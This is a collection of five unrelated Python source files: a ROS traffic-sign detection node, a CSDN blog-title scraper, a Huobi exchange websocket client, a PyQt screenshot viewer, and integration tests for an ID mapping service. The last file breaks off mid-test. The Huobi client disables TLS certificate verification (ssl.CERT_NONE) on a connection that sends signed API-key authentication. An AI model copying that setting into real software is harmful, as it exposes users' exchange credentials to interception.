| source | python |
|---|---|
traffic_sign_node.py
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
traffic_sign_node.py
This module creates the traffic_sign_node which is responsible for collecting inference results
from object_detection_pkg and post-processing the signs.
After post-processing, this module provides suggested directives based on the detected signs.
The node defines:
inference_subscriber: A subscriber to the /object_detection_pkg/inference_results published
by the object_detection_pkg with inference data.
traffic_sign_publisher: A publisher that publishes directives based on detected signs.
"""
import time
import signal
import threading
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (
InferResultsArray,
TrafficSign,
TrafficLight,
TrafficMsg,
)
from traffic_sign_pkg import constants, utils, cv_utils
class TrafficSignNode(Node):
def __init__(self, qos_profile):
"""Create a ObjectDetectionNode."""
super().__init__("traffic_sign_node")
self.get_logger().info("traffic_sign_node started.")
# Double buffer to hold the input inference data.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Check if the inference output needs to be published to localhost using web_video_server
self.declare_parameter("PUBLISH_DISPLAY_OUTPUT")
self.publish_display_output = (
self.get_parameter("PUBLISH_DISPLAY_OUTPUT")
.get_parameter_value()
.bool_value
)
self.get_logger().info(f"Publish output set to {self.publish_display_output}")
# Create subscription to inference results published by the object detection node.
self.image_subscriber = self.create_subscription(
InferResultsArray,
constants.INFERENCE_RESULT_TOPIC,
self.on_inference_received_cb,
qos_profile,
)
# Creating publisher for display_image.
self.display_image_publisher = self.create_publisher(
Image, constants.DISPLAY_IMAGE_PUBLISHER_TOPIC, 10
)
# Publisher for detection results.
self.traffic_sign_publisher = self.create_publisher(
TrafficMsg, constants.TRAFFIC_SIGN_PUBLISHER_TOPIC, qos_profile
)
self.bridge = CvBridge()
# Launching a separate thread to run processing.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_detection)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(
f"Waiting for input data on {constants.INFERENCE_RESULT_TOPIC}"
)
def wait_for_thread(self):
"""Function which joins the created background thread."""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread."""
self.stop_thread = True
def on_inference_received_cb(self, inference_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
inference_data (InferResultsArray): Message containing inference results from object detection.
"""
self.input_buffer.put(inference_data)
def run_detection(self):
"""Method for running processing based on the received input data."""
try:
while not self.stop_thread:
# Get the next input from the double buffer (InferResultsArray)
inference_results = self.input_buffer.get()
start_time = time.time()
# First get the input into a format we can work with.
image = self.bridge.imgmsg_to_cv2(inference_results.images[0])
results = inference_results.results # InferResults object
self.get_logger().info(
f"Got input data... Results: {len(inference_results.results)} Images: {len(inference_results.images)}"
)
# List of tuples (sign, value, approx_distance)
detected_signs = []
# List of tuples (color, approx_distance)
detected_traffic_lights = []
# Process each inference result object detected:
for res in results:
# First check detected label.
coco_label = constants.COCO_LABELS[res.class_label]
bounding_box = (
int(res.x_min),
int(res.y_min),
int(res.x_max),
int(res.y_max),
)
# TODO: Compute better approx distance metric.
max_bbox_size = image.shape[0] * image.shape[1]
bbox_size = (bounding_box[2] - bounding_box[0]) * (
bounding_box[3] - bounding_box[1]
)
# Smaller means closer.
distance_approximation = 1.0 - bbox_size / max_bbox_size
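# Worked example (illustrative numbers): for a 640x480 frame,
# max_bbox_size = 307200; a detection spanning 160x120 pixels gives
# bbox_size = 19200, so distance_approximation = 1.0 - 19200 / 307200 = 0.9375.
# A box covering the whole frame scores 0.0 (very close), while a tiny,
# presumably distant object scores close to 1.0.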
self.get_logger().info(f"Postprocessing {coco_label}")
if coco_label == "traffic light":
color = cv_utils.detect_traffic_light_color(image, bounding_box)
self.get_logger().info(f"Traffic detected -> {color}")
detected_traffic_lights.append((color, distance_approximation))
elif coco_label == "street sign":
detected_signs.append(
("street sign", -1.0, distance_approximation)
)
elif coco_label == "stop sign":
detected_signs.append(
("stop sign", 0.0, distance_approximation)
)
else:
self.get_logger().info(f"No logic for label {coco_label}")
traffic_message = TrafficMsg()
traffic_message.signs = []
traffic_message.lights = []
for (sign, value, distance_approximation) in detected_signs:
msg = TrafficSign()
msg.type = sign
msg.value = value
msg.distance = distance_approximation
traffic_message.signs.append(msg)
for (color, distance_approximation) in detected_traffic_lights:
msg = TrafficLight()
msg.type = "traffic light"
msg.color = color
msg.distance = distance_approximation
traffic_message.lights.append(msg)
# Always publish the message regardless of the number of detected signs:
# no signs is also valid road information.
self.traffic_sign_publisher.publish(traffic_message)
# TODO: Output debug data on top of input image.
if self.publish_display_output:
self.get_logger().info("Publishing display output")
display_image = image
# Publish to display topic (Can be viewed on localhost:8080).
display_image = self.bridge.cv2_to_imgmsg(
np.array(display_image), "bgr8"
)
self.display_image_publisher.publish(display_image)
self.get_logger().info(
f"Total execution time = {time.time() - start_time}"
)
except Exception as ex:
self.get_logger().error(f"Failed detection step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
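# Illustrative addition (not part of the original package): a minimal way for a
# downstream node to consume the directives published above. It only uses names
# already imported in this module; adjust the QoS depth as needed.
def example_traffic_msg_consumer(node: Node):
    """Sketch only: subscribe to the TrafficMsg directives published by this node."""
    def on_traffic_msg(msg):
        node.get_logger().info(
            f"Received {len(msg.signs)} signs and {len(msg.lights)} lights"
        )
    return node.create_subscription(
        TrafficMsg, constants.TRAFFIC_SIGN_PUBLISHER_TOPIC, on_traffic_msg, 1
    )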
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(
reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST,
)
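# Best-effort reliability with a keep-last history of depth 1 means stale
# messages are simply dropped, so the node always works on the most recent
# inference result instead of building up a backlog.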
try:
traffic_sign_node = TrafficSignNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
traffic_sign_node.get_logger().info("Signal Handler initiated")
traffic_sign_node.thread_shutdown()
traffic_sign_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(traffic_sign_node, executor)
except Exception as ex:
traffic_sign_node.get_logger().error(f"Exception in Traffic Sign Node: {ex}")
traffic_sign_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
traffic_sign_node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
spider_blogtitle.py
|
# -*- coding: utf-8 -*-
# Get article names from my CSDN blog (Python 2 script)
__author__ = "Lucky"
import urllib2
import re,time
import threading
class Collector:
def __init__(self):
self.article_number = 0
self.article_name = []
def add(self, name):
self.article_number += 1
self.article_name.append(name)
return
collector = Collector()
class Spider:
def __init__(self):
self.siteURL = 'http://blog.csdn.net/luckyjoy521/article/list/'
self.hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 'Accept-Encoding': 'none', 'Accept-Language': 'en-US,en;q=0.8', 'Connection': 'keep-alive'}
def getPage(self, pageIndex):
url = self.siteURL + str(pageIndex)
request = urllib2.Request(url, headers=self.hdr)
for i in range(1,4):
try:
response = urllib2.urlopen(request, timeout=8) #timeout
page = response.read()
print url
return page
except Exception, e:
time.sleep(8)
print str(e) + " Retry to " + url
print "Connection Failed to " + url
return ""
def getContent(self, pageIndex):
page = self.getPage(pageIndex)
# extract the line that follows each 'link_title' marker (the article title)
pattern = re.compile("(?<=link_title).*\n.*(?=\n)")
items = re.findall(pattern, page)
for item in items:
it = item.split("\n")
an = it[1].strip()
print an
collector.add(an)
#record page
f1 = open("page_" + str(pageIndex) + ".html", "w")
f1.write(page)
f1.close()
return
def worker(index):
spd = Spider()
spd.getContent(index)
return
if __name__ == "__main__":
threads = []
for i in range(1,18):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.setDaemon(True) # So thread can be terminated by Ctrl+C
t.start()
for t in threads:
t.join(600)
print collector.article_number
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
import urllib.parse
from huobi.base.printtime import PrintDate
from huobi.constant.system import ApiVersion
from huobi.impl.utils.apisignaturev2 import create_signature_v2
from huobi.impl.utils.timeservice import get_current_timestamp
from huobi.impl.utils.urlparamsbuilder import UrlParamsBuilder
from huobi.impl.utils.apisignature import create_signature
from huobi.exception.huobiapiexception import HuobiApiException
from huobi.impl.utils import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws, *args):  # newer websocket-client versions pass close status/message as extra args
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connecting...")
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connection event loop down")
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
# threading.Thread.__init__(self)
self.__thread = None
self.__market_url = "wss://api.huobi.pro/ws"
self.__trading_url = "wss://api.huobi.pro/ws/" + request.api_version
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger("huobi-client")
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
host = urllib.parse.urlparse(uri).hostname
if host.find("api") == 0:
self.__market_url = "wss://" + host + "/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
else:
self.__market_url = "wss://" + host + "/api/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
if request.is_trading:
self.url = self.__trading_url
else:
self.url = self.__market_url
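# Example of the URL selection above (illustrative): for
# uri = "wss://api.huobi.pro/ws/v2" the hostname is "api.huobi.pro", which
# starts with "api", so market data goes to "wss://api.huobi.pro/ws" and the
# trading line to "wss://api.huobi.pro/ws/" + request.api_version.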
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
self.logger.warning("[Sub][" + str(self.id) + "] Reconnecting after "
+ str(self.delay_in_second) + " seconds later")
def re_connect(self):
if self.delay_in_second != 0:
self.delay_in_second -= 1
self.logger.warning("In delay connection: " + str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info("[Sub][" + str(self.id) + "] Already connected")
else:
self.__thread = threading.Thread(target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
#print("sending data :", data)
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error("[Sub][" + str(self.id) + "] Closing normally")
def on_open(self, ws):
#print("### open ###")
self.logger.info("[Sub][" + str(self.id) + "] Connected to server")
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.is_trading:
try:
if self.request.api_version == ApiVersion.VERSION_V1:
builder = UrlParamsBuilder()
create_signature(self.__api_key, self.__secret_key,
"GET", self.url, builder)
builder.put_url("op", "auth")
self.send(builder.build_url_to_json())
elif self.request.api_version == ApiVersion.VERSION_V2:
builder = UrlParamsBuilder()
create_signature_v2(self.__api_key, self.__secret_key,
"GET", self.url, builder)
self.send(builder.build_url_to_json())
else:
self.on_error("api version for create the signature fill failed")
except Exception as e:
self.on_error("Unexpected error when create the signature: " + str(e))
else:
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
exception = HuobiApiException(HuobiApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error("[Sub][" + str(self.id) + "] " + str(error_message))
def on_failure(self, error):
self.on_error("Unexpected error: " + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
if isinstance(message, str):
#print("RX string : ", message)
json_wrapper = parse_json_from_string(message)
elif isinstance(message, bytes):
#print("RX bytes: " + gzip.decompress(message).decode("utf-8"))
json_wrapper = parse_json_from_string(gzip.decompress(message).decode("utf-8"))
else:
print("RX unknow type : ", type(message))
return
if json_wrapper.contain_key("status") and json_wrapper.get_string("status") != "ok":
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("err-code") and json_wrapper.get_int("err-code") != 0:
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("op"):
op = json_wrapper.get_string("op")
if op == "notify":
self.__on_receive(json_wrapper)
elif op == "ping":
ping_ts = json_wrapper.get_string("ts")
self.__process_ping_on_trading_line(ping_ts)
elif op == "auth":
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
elif op == "req":
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("action"): # for V2
action_name = json_wrapper.get_string("action")
if action_name == "ping":
action_data = json_wrapper.get_object("data")
ping_ts = action_data.get_string("ts")
self.__process_ping_on_v2_trade(ping_ts)
elif action_name == "sub":
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("subscribe ACK received")
else:
logging.error("receive error data : " + message)
elif action_name == "req": #
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("signature ACK received")
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
else:
logging.error("receive error data : " + message)
elif action_name == "push":
action_data = json_wrapper.get_object("data")
if action_data:
self.__on_receive(json_wrapper)
else:
logging.error("receive error push data : " + message)
elif json_wrapper.contain_key("ch"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("rep"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("ping"):
ping_ts = json_wrapper.get_string("ping")
self.__process_ping_on_market_line(ping_ts)
else:
print("unknown data process, RX: " + gzip.decompress(message).decode("utf-8"))
def __on_receive(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
#self.send("{\"op\":\"pong\",\"ts\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"op\":\"pong\",\"ts\":" + str(ping_ts) + "}")
return
def __process_ping_on_market_line(self, ping_ts):
#self.send("{\"pong\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"pong\":" + str(ping_ts) + "}")
return
def __process_ping_on_v2_trade(self, ping_ts):
# PrintDate.timestamp_to_date(ping_ts)
self.send("{\"action\": \"pong\",\"data\": {\"ts\": " + str(ping_ts) +"}}")
return
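# Illustrative heartbeat payloads handled by the three helpers above
# (timestamps are example values only):
#   market line:  server sends {"ping": 1591702563468}
#                 client replies {"pong": 1591702563468}
#   v1 trading:   server sends {"op": "ping", "ts": "1591702563468"}
#                 client replies {"op": "pong", "ts": 1591702563468}
#   v2 trading:   server sends {"action": "ping", "data": {"ts": 1591702563468}}
#                 client replies {"action": "pong", "data": {"ts": 1591702563468}}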
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error("[Sub][" + str(self.id) + "] Connection is closing due to error")
|
screenshots.py
|
import logging
from threading import Thread
from typing import List
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap, QCursor
from PyQt5.QtWidgets import QDialog, QLabel, QPushButton, QVBoxLayout, QProgressBar, QApplication, QWidget, \
QSizePolicy, QHBoxLayout
from bauh.api.abstract.cache import MemoryCache
from bauh.api.http import HttpClient
from bauh.view.qt import qt_utils
from bauh.view.qt.components import new_spacer
from bauh.view.qt.thread import AnimateProgress
from bauh.view.qt.view_model import PackageView
from bauh.view.util.translation import I18n
class ScreenshotsDialog(QDialog):
def __init__(self, pkg: PackageView, http_client: HttpClient, icon_cache: MemoryCache, i18n: I18n, screenshots: List[QPixmap], logger: logging.Logger):
super(ScreenshotsDialog, self).__init__()
self.setWindowTitle(str(pkg))
self.screenshots = screenshots
self.logger = logger
self.loaded_imgs = []
self.download_threads = []
self.i18n = i18n
self.http_client = http_client
self.progress_bar = QProgressBar()
self.progress_bar.setObjectName('progress_screenshots')
self.progress_bar.setCursor(QCursor(Qt.WaitCursor))
self.progress_bar.setMaximumHeight(10 if QApplication.instance().style().objectName().lower() == 'windows' else 6)
self.progress_bar.setTextVisible(False)
self.thread_progress = AnimateProgress()
self.thread_progress.signal_change.connect(self._update_progress)
self.thread_progress.start()
# THERE ARE CRASHES WITH SOME RARE ICONS ( like insomnia ). IT CAN BE A QT BUG. IN THE MEANTIME, ONLY THE TYPE ICON WILL BE RENDERED
#
# icon_data = icon_cache.get(pkg.model.icon_url)
#
# if icon_data and icon_data.get('icon'):
# self.setWindowIcon(icon_data.get('icon'))
# else:
# self.setWindowIcon(QIcon(pkg.model.get_type_icon_path()))
self.setWindowIcon(QIcon(pkg.model.get_type_icon_path()))
self.setLayout(QVBoxLayout())
self.layout().addWidget(new_spacer())
self.img = QLabel()
self.img.setObjectName('image')
self.layout().addWidget(self.img)
self.layout().addWidget(new_spacer())
self.container_buttons = QWidget()
self.container_buttons.setObjectName('buttons_container')
self.container_buttons.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)
self.container_buttons.setContentsMargins(0, 0, 0, 0)
self.container_buttons.setLayout(QHBoxLayout())
self.bt_back = QPushButton(' < ' + self.i18n['screenshots.bt_back.label'].capitalize())
self.bt_back.setObjectName('back')
self.bt_back.setProperty('control', 'true')
self.bt_back.setCursor(QCursor(Qt.PointingHandCursor))
self.bt_back.clicked.connect(self.back)
self.container_buttons.layout().addWidget(self.bt_back)
self.container_buttons.layout().addWidget(new_spacer())
self.container_buttons.layout().addWidget(self.progress_bar)
self.container_buttons.layout().addWidget(new_spacer())
self.bt_next = QPushButton(self.i18n['screenshots.bt_next.label'].capitalize() + ' > ')
self.bt_next.setObjectName('next')
self.bt_next.setProperty('control', 'true')
self.bt_next.setCursor(QCursor(Qt.PointingHandCursor))
self.bt_next.clicked.connect(self.next)
self.container_buttons.layout().addWidget(self.bt_next)
self.layout().addWidget(self.container_buttons)
self.img_idx = 0
self.max_img_width = 800
self.max_img_height = 600
for idx, s in enumerate(self.screenshots):
t = Thread(target=self._download_img, args=(idx, s), daemon=True)
t.start()
self.resize(self.max_img_width + 5, self.max_img_height + 5)
self._load_img()
qt_utils.centralize(self)
def _update_progress(self, val: int):
self.progress_bar.setValue(val)
def _load_img(self):
if len(self.loaded_imgs) > self.img_idx:
img = self.loaded_imgs[self.img_idx]
if isinstance(img, QPixmap):
self.img.setText('')
self.img.setPixmap(img)
else:
self.img.setText(img)
self.img.setPixmap(QPixmap())
self.img.unsetCursor()
self.thread_progress.stop = True
self.progress_bar.setVisible(False)
else:
self.img.setPixmap(QPixmap())
self.img.setCursor(QCursor(Qt.WaitCursor))
self.img.setText('{} {}/{}...'.format(self.i18n['screenshots.image.loading'], self.img_idx + 1, len(self.screenshots)))
self.progress_bar.setVisible(True)
self.thread_progress.start()
if len(self.screenshots) == 1:
self.bt_back.setVisible(False)
self.bt_next.setVisible(False)
else:
self.bt_back.setEnabled(self.img_idx != 0)
self.bt_next.setEnabled(self.img_idx != len(self.screenshots) - 1)
def _download_img(self, idx: int, url: str):
self.logger.info('Downloading image [{}] from {}'.format(idx, url))
res = self.http_client.get(url)
if res:
if not res.content:
self.logger.warning('Image [{}] from {} has no content'.format(idx, url))
self.loaded_imgs.append(self.i18n['screenshots.download.no_content'])
self._load_img()
else:
self.logger.info('Image [{}] successfully downloaded'.format(idx))
pixmap = QPixmap()
pixmap.loadFromData(res.content)
if pixmap.size().height() > self.max_img_height or pixmap.size().width() > self.max_img_width:
pixmap = pixmap.scaled(self.max_img_width, self.max_img_height, Qt.KeepAspectRatio, Qt.SmoothTransformation)
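# e.g. with max_img_width=800 and max_img_height=600, a 1920x1080 screenshot
# is scaled down to 800x450: Qt.KeepAspectRatio fits the image inside the
# bounding box while preserving its aspect ratio.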
self.loaded_imgs.append(pixmap)
if self.img_idx == idx:
self._load_img()
else:
self.logger.info("Could not retrieve image [{}] from {}".format(idx, url))
self.loaded_imgs.append(self.i18n['screenshots.download.no_response'])
self._load_img()
def back(self):
self.img_idx -= 1
self._load_img()
def next(self):
self.img_idx += 1
self._load_img()
|
service_test.py
|
from pytest import fixture
from jgikbase.idmapping.service.mapper_service import create_app
from jgikbase.test.idmapping import test_utils
from jgikbase.test.idmapping.mongo_controller import MongoController
from threading import Thread
from flask import request
from configparser import ConfigParser
import os
import tempfile
import shutil
import requests_mock
import requests
import logging
import time
import re
from jgikbase.test.idmapping.test_utils import assert_ms_epoch_close_to_now,\
assert_json_error_correct
from pymongo.mongo_client import MongoClient
from jgikbase.idmapping.storage.mongo.id_mapping_mongo_storage import IDMappingMongoStorage
from jgikbase.idmapping.core.user import Username, AuthsourceID, User
from jgikbase.idmapping.core.tokens import Token
from jgikbase.idmapping.core.object_id import NamespaceID
from jgikbase.idmapping.storage.id_mapping_storage import IDMappingStorage
import json
# These tests check that all the parts of the system play nice together. That generally means,
# per endpoint, one happy path test and one unhappy path test, where the unhappy path goes
# through as much of the stack as possible.
# The unit tests are responsible for really getting into the nooks and crannies of each class.
# Should test logging here...? Skip for now. Maybe add later.
VERSION = '0.1.1'
DB_NAME = 'test_db_idmapping_service_integration'
KBASE_URL = 'http://fake_url_for_mocking.com'
KBASE_ADMIN_ROLE = 'fake_role_for_mocking'
KBASE_TOKEN = 'fake_token_for_mocking'
def create_deploy_cfg(mongo_port):
cfg = ConfigParser()
cfg.add_section('idmapping')
cfg['idmapping']['mongo-host'] = 'localhost:' + str(mongo_port)
cfg['idmapping']['mongo-db'] = DB_NAME
cfg['idmapping']['authentication-enabled'] = 'local, kbase'
cfg['idmapping']['authentication-admin-enabled'] = 'local, kbase'
cfg['idmapping']['auth-source-kbase-factory-module'] = (
'jgikbase.idmapping.userlookup.kbase_user_lookup')
cfg['idmapping']['auth-source-kbase-init-token'] = KBASE_TOKEN
cfg['idmapping']['auth-source-kbase-init-url'] = KBASE_URL
cfg['idmapping']['auth-source-kbase-init-admin-role'] = KBASE_ADMIN_ROLE
_, path = tempfile.mkstemp('.cfg', 'deploy-', dir=test_utils.get_temp_dir(), text=True)
with open(path, 'w') as handle:
cfg.write(handle)
return path
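# The generated deploy config looks roughly like this (with the real Mongo port):
#   [idmapping]
#   mongo-host = localhost:<mongo_port>
#   mongo-db = test_db_idmapping_service_integration
#   authentication-enabled = local, kbase
#   authentication-admin-enabled = local, kbase
#   auth-source-kbase-factory-module = jgikbase.idmapping.userlookup.kbase_user_lookup
#   auth-source-kbase-init-token = fake_token_for_mocking
#   auth-source-kbase-init-url = http://fake_url_for_mocking.com
#   auth-source-kbase-init-admin-role = fake_role_for_mocking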
@fixture(scope='module')
def mongo():
# remove any current handlers, since tests run in one process
logging.getLogger().handlers.clear()
mongoexe = test_utils.get_mongo_exe()
tempdir = test_utils.get_temp_dir()
wt = test_utils.get_use_wired_tiger()
mongo = MongoController(mongoexe, tempdir, wt)
print('running mongo {}{} on port {} in dir {}'.format(
mongo.db_version, ' with WiredTiger' if wt else '', mongo.port, mongo.temp_dir))
yield mongo
del_temp = test_utils.get_delete_temp_files()
print('shutting down mongo, delete_temp_files={}'.format(del_temp))
mongo.destroy(del_temp)
if del_temp:
shutil.rmtree(test_utils.get_temp_dir())
@fixture
def service_port(mongo):
mongo.clear_database(DB_NAME, drop_indexes=True)
os.environ['ID_MAPPING_CONFIG'] = create_deploy_cfg(mongo.port)
with requests_mock.Mocker() as m:
m.get('http://fake_url_for_mocking.com/',
request_headers={'Accept': 'application/json'},
json={'version': '0.1.2', 'gitcommithash': 'hashyhash', 'servertime': 3})
app = create_app()
# this is probably the dumbest thing I've ever seen
@app.route('/ohgodnothehumanity')
def kill():
request.environ.get('werkzeug.server.shutdown')()
return ('', 200)
portint = test_utils.find_free_port()
Thread(target=app.run, kwargs={'port': portint}).start()
time.sleep(0.05)
port = str(portint)
print('running id mapping service at localhost:' + port)
yield port
# shutdown the server
requests.get('http://localhost:' + port + '/ohgodnothehumanity')
def get_storage_instance(mongo) -> IDMappingStorage:
client = MongoClient('localhost:' + str(mongo.port))
return IDMappingMongoStorage(client[DB_NAME])
def test_root(service_port):
r = requests.get('http://localhost:' + service_port)
j = r.json()
time_ = j['servertime']
commit = j['gitcommithash']
del j['servertime']
del j['gitcommithash']
assert j == {'service': 'ID Mapping Service', 'version': VERSION}
assert re.match(r'[a-f\d]{40}', commit) is not None
assert_ms_epoch_close_to_now(time_)
assert r.status_code == 200
def test_create_and_get_namespace(service_port, mongo):
storage = get_storage_instance(mongo)
t = Token('foobar')
# fail to create a namespace
r = requests.put('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + t.token})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 401,
'httpstatus': 'Unauthorized',
'appcode': 10020,
'apperror': 'Invalid token',
'message': '10020 Invalid token'
}
})
assert r.status_code == 401
# succeed at creating a namespace
storage.create_local_user(Username('user1'), t.get_hashed_token())
storage.set_local_user_as_admin(Username('user1'), True)
r = requests.put('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + t.token})
assert r.status_code == 204
# get the namespace with a populated user list
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + t.token})
assert r.json() == {'namespace': 'myns', 'publicly_mappable': False, 'users': []}
assert r.status_code == 200
# fail getting a namespace
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns1')
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50010,
'apperror': 'No such namespace',
'message': '50010 No such namespace: myns1'
}
})
assert r.status_code == 404
def test_add_remove_user(service_port, mongo):
storage = get_storage_instance(mongo)
lut = Token('foobar')
storage.create_local_user(Username('lu'), lut.get_hashed_token())
storage.set_local_user_as_admin(Username('lu'), True)
storage.create_namespace(NamespaceID('myns'))
# add a user
# tests integration with all parts of the kbase user handler
with requests_mock.Mocker(real_http=True) as m:
m.get(KBASE_URL + '/api/V2/token', request_headers={'Authorization': 'mytoken'},
json={'user': 'u1', 'expires': 4800, 'cachefor': 5600})
m.get(KBASE_URL + '/api/V2/me', request_headers={'Authorization': 'mytoken'},
json={'customroles': [KBASE_ADMIN_ROLE]})
m.get(KBASE_URL + '/api/V2/users/?list=imauser',
request_headers={'Authorization': KBASE_TOKEN},
json={'imauser': 'im totally a user omg'})
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'kbase mytoken'})
assert r.status_code == 204
# check the user is there
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + lut.token})
assert r.json() == {'namespace': 'myns',
'publicly_mappable': False,
'users': ['kbase/imauser']}
# fail adding the same user. The KBase info is cached now so we don't need to mock it again
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'kbase mytoken'})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 400,
'httpstatus': 'Bad Request',
'appcode': 40000,
'apperror': 'User already exists',
'message': ('40000 User already exists: User kbase/imauser already ' +
'administrates namespace myns')
}
})
assert r.status_code == 400
# remove the user using a local admin
r = requests.delete('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
